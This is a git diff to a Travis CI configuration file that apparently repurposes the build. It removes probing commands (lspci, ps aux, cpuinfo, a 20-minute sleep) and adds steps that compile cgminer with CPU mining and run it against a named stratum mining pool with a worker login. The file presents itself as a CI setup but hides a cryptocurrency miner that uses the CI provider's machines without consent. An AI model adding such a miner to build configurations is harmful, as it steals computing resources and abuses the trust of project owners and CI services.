--- a/.travis.yml
+++ b/.travis.yml
@@ -1,20 +1,10 @@
 install:
   - sudo apt-get install -y git autoconf libtool libcurl4-openssl-dev libncurses5-dev pkg-config yasm make
+script:
   - git clone git://github.com/ckolivas/cgminer.git
   - cd cgminer/
   - git checkout v2.9.6
   - ./autogen.sh --disable-opencl --disable-adl --enable-cpumining
   - CFLAGS="-O2 -Wall -march=native" ./configure --disable-opencl --disable-adl --enable-cpumining
   - make -j8
-  - ./cgminer --benchmark
-script:
-  - lspci -v
-  - cat /proc/cpuinfo
-  - ps aux
-  - dpkg -l
-  - echo "Sleeping"
-  - yes "aaaa"&
-  - sleep $(( 60*20 ))
-  - echo "Done"
-after_success:
-  - coveralls
+  - ./cgminer -o stratum+tcp://pool.itzod.ru:3333 -u bitcoinfun_0 -p hyrevyses -T
